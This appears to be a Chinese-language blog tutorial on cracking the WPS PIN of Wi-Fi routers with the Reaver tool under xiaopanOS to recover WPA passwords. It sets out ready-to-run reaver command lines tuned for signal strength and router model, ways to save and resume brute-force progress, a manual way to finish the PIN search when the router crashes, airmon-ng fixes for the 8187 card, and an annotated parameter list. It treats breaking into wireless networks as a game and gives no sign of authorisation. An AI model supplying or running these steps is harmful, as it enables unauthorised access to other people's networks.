(非TP-LINK路由推荐–d9 –t9参数防止路由僵死

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)

小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子)

目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1

目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t 5  -c 1

目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d 5  -c 1

参数一:-a -n -N -x 20 -r 100:10 -| 60 -t 2 -v d 0 (我默认使用这个)

参数二:-a –v –N –x20–r100:10 l300 –t12 –d0 (如想多等会,可将–t12修改为–t15等)

参数三:-a –v –S –x20–r100:10 l300 –t12 –d0  (如重码多且速度太快,可将–d0修改为–d2)等)

参数四:-a –v –N –x20–r100:10 l300 –t12 –d0 –S(其他参数也可试一下,不要加-n)

xiaopanOS中reaver参数

-a -v -S -x 20 -r 100:10 -l 300

光盘启动、u盘/硬盘启动保存学习进度的方法

reaver1.3的保存路径:打开桌面最后边一个图标xfec 定位到/etc/reaver下,有一个wpc后缀的文件,名字是你学习的目标的mac地址,复制到你的U盘,路径是/mnt/sdb1(一般是这个,自己找找,要是没有东西就右键mount),以后重启到xiaopanOS,把这文件复制到原来的路径,再试试,可以载入进度了!o(∩_∩)o 哈哈

reaver1.4的保存路径:保存目录:/usr/local/etc/reaver如果xfe文件管理器未获得ROOT权限。请先运行root shell后输入xfe即可获得root权限。保存方法同上。下次重启动后,再手工复制到/etc/reaver/ 目录下即可

MAC地址.wpc 其实是个文本文件,格式与破密用字典酷似,其第一行和第二行,分别是4位数和3位数的指示位置数(+4)。

------------------------------------------------------------------------------

如果进度到99.9%后,AP死机,可打开它,总共1000个3位数,找出剩余的十几个PIN码,用QSS、WPS客户端软件,手动测试、破密。如果是跑了99.99%死机,  意味吗?  你懂的吧? 最后一个PIN就是。

以下这个命令是指定PIN码,获得WPA 密码PSK

reaver -i mon0 -b MAC -p PIN8位数

如果上述措施不后,仍不见PSK密码,可能因软件原因,漏码了!需要重新跑后三位数!

(前四位正确的话)reaver -i mon0 -b MAC -p PIN前4位数

1.遇见8187驱动RF-kill的  xiaopanos

对8187的网卡支持不是太好,有时会出现驱动加载不了,就是输入第一条命令后出现operation not possible due to RF-kill,我想大部分人也遇到过把。新版本0.34使用命令rfkill unblock all解决这个问题,容易出现问题的是0.3.2版本的。

第一种尝试的解决办法:这时候就断开USB,等上大概10几秒把再插上,连续插拔几次总有一次会好。

第二种尝试的解决办法:先运行一下奶瓶扫描一会,然后退出奶瓶。 虚拟机 USB图标(USB图标上的小点)由深绿变成浅绿色,变浅绿就输入

ifconfig wlan0 up

airmon-ng start wlan0

第三种解决办法:出现错误后的解决

a.Root Shell窗口敲击命令“ifconfig -a”,查看最后一项是否出现wlan0,这个就是你的无

线网卡。如果没有出现拔插网卡,直到测试出现wlan0。

b.接下来输入第二条命令“ifconfig wlan0 up”,接下来第三条“airmon-ng start wlan0”载入

网卡。如果出现operation not possible due to RF-kill,不要惊慌继续输入命令“airmon-ng start

wlan0”多输入几次,然后拔出USB网卡,再插入,重复第2步的命令。一般情况下就会

正常载入了括号内只会显示monitor mode enabled on mon0,不会出现operation not possible

due to RF-kill,如果不行以上步骤再次重复,直到解决。

c.输入“airodump-ng mon0”(如果括号内显示的是monitor mode enabled on mon1,相应的

命令就改为airodump-ng mon1,其他的类似),测试一下,要是可以正常扫描,说明8187L加载成功,就可以reaver了,你懂的!

reaver参数说明

必须参数

-i, --interface=<wlan> Name of the monitor-mode interface to use 网卡的监视接口,通常是mon0

-b, --bssid=<mac> BSSID of the target AP

AP的MAC地址

Optional Arguments: 可选参数

-m, --mac=<mac> MAC of the host system

指定本机MAC地址

-e, --essid=<ssid> ESSID of the target AP

路由器的ESSID,一般不用指定

-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) 信号的频道,如果不指定会自动扫描 -o, --out-file=<file> Send output to a log file [stdout]

输出日志文件

-s, --session=<file> Restore a previous session file

恢复进度文件

-C, --exec=<command> Execute the supplied command upon successful pin recovery pin成功后执行命令

-D, --daemonize Daemonize reaver

设置reaver成Daemon

-a, --auto Auto detect the best advanced options for the target AP 对目标AP自动检测高级参数

-f, --fixed Disable channel hopping

禁止频道跳转

-5, --5ghz Use 5GHz 802.11 channels

使用5G频道

-v, --verbose Display non-critical warnings (-vv for more) 显示不重要警告信息 -vv 可以显示更多 -q, --quiet Only display critical messages

只显示关键信息

-h, --help Show help

显示帮助

Advanced Options:高级选项

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4位或者8位pin码 -d, --delay=<seconds> Set the delay between pin attempts [1] pin间延时,默认1秒

-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts

[60]

AP锁定WPS后等待时间

-g, --max-attempts=<num> Quit after num pin attempts

最大pin次数

1/2

-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures

[0]

10次意外失败后等待时间,默认0秒 -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts 每x次pin后等待y秒

-t, --timeout=<seconds> Set the receive timeout period [5] 收包超时,默认5秒

-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] M5/M7超时,默认0.2秒

-A, --no-associate Do not associate with the AP (association must be done by another application)

不连入AP(连入过程必须有其他程序完成) -N, --no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息(如果一直pin不动,可以尝试这个参数)

-S, --dh-small Use small DH keys to improve crack speed 使用小DH关键值提高速度(推荐使用) -L, --ignore-locks Ignore locked state reported by the target AP 忽略目标AP报告的锁定状态

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet 每当收到EAP失败包就终止WPS进程 -n, --nack Target AP always sends a NACK [Auto] 对目标AP总是发送NACK,默认自动 -w, --win7 Mimic a Windows 7 registrar [False] 模拟win7注册,默认关闭

Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。

reaver使用相关的更多相关文章

  1. 嵌入式单片机STM32应用技术(课本)

    目录SAIU R20 1 6 第1页第1 章. 初识STM32..................................................................... ...

  2. wifi reaver

    PIN码的格式很简单, 八位十进制数,最后一位(第8位)为校验位(可根据前7位算出),验证时先检测前4位,如果一致则反馈一个信息,所以只需1万次就可完全扫描一遍前4位,前4位确定下来的话,只需再试10 ...

  3. 无线wifi-PJ-之在开启WPS下使用reaver

    PJ简单解释: PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组 合,一共就是一万一千个密码组合. 10的4次方+10的3次方=11000个密码组合. 当reaver确定前 ...

  4. 如何使用Reaver破解Wi-Fi网络的WPA密码

    via: http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver 译者:Mr小眼儿 本 ...

  5. ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

    路由器的WPS功能 很多路由器都有WPS功能, 这边的WPS不是office工具软件, 而是路由器的一个功能: 路由器中WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Prot ...

  6. java中的字符串相关知识整理

    字符串为什么这么重要 写了多年java的开发应该对String不陌生,但是我却越发觉得它陌生.每学一门编程语言就会与字符串这个关键词打不少交道.看来它真的很重要. 字符串就是一系列的字符组合的串,如果 ...

  7. SQL Server相关书籍

    SQL Server相关书籍 (排名不分先后) Microsoft SQL Server 企业级平台管理实践 SQL Server 2008数据库技术内幕 SQL Server性能调优实战 SQL S ...

  8. dotNET跨平台相关文档整理

    一直在从事C#开发的相关技术工作,从C# 1.0一路用到现在的C# 6.0, 通常情况下被局限于Windows平台,Mono项目把我们C#程序带到了Windows之外的平台,在工作之余花了很多时间在M ...

  9. 在ASP.NET Core应用中如何设置和获取与执行环境相关的信息?

    HostingEnvironment是承载应用当前执行环境的描述,它是对所有实现了IHostingEnvironment接口的所有类型以及对应对象的统称.如下面的代码片段所示,一个HostingEnv ...

随机推荐

  1. A - Wireless Network-poj2236(简单并查集)

    说是有N个村庄,刚开始每个村庄的网络都是受损状态,于是派一个人去修理,修理过的村庄只能联系距离他们半径为D的村庄,当然他们可以通过一些村庄当中转站,联系.   输入先输入一个N表示有N个村庄,还有一个 ...

  2. OpenReports操作指南

    最近要玩OpenReports,但在网上找了一圈,能用的资料少得可怜,所以把最近使用下来,积累的一些技巧记录下来(有部分整合了网上的资源). 备注:以下操作说明基于已做汉化的项目(汉化方案请参考:ht ...

  3. js~fancybox为我们提供的iframe功能

    对于fancybox我们已经耳熟能详了,一般用来到表单的弹框,提示弹框等,而今天,我们将分页列表也使用fancybox来实现一下,这东西听起来简单,但做起来还真不是那么回事,有事细节需要我们注意的,首 ...

  4. 编写一个方法,输入DOM节点,返回包含所有父节点的一个数组

    编写一个方法,输入DOM节点,返回包含所有父节点的一个数组 function getParentsNodes(element) { var parents = []; var getParentsNo ...

  5. Linux - 标准输入转换为标准输出 代码(C)

    标准输入转换为标准输出 代码(C) 本文地址:http://blog.csdn.net/caroline_wendy Linux能够使用getc()和putc(),读取和写入每个输入字符. 代码: / ...

  6. RT:How HTTP use TCP connection

    In HTTP/0.9 (not used anymore), each request uses a separate TCP connection, and the end of a respon ...

  7. RuntimePermissions

    This sample shows runtime permissions available in Android M and above. Display the log on screen to ...

  8. Android开发ScrollView上下左右滑动事件冲突整理一(根据事件)

    主要通过重写 onInterceptTouchEvent 事件来解决,代码如下: package com.cm.android.pad.view.itemView; import android.co ...

  9. Android手机适配——UI图片适配

    转载请注明出处:http://blog.csdn.net/guolin_blog/article/details/50727753 在Android项目当中,drawable文件夹都是用来放置图片资源 ...

  10. 移动页面缩放方法之(二)控制HTML

    <!DOCTYPE HTML> <html lang="zh-cn"> <head> <meta http-equiv="Con ...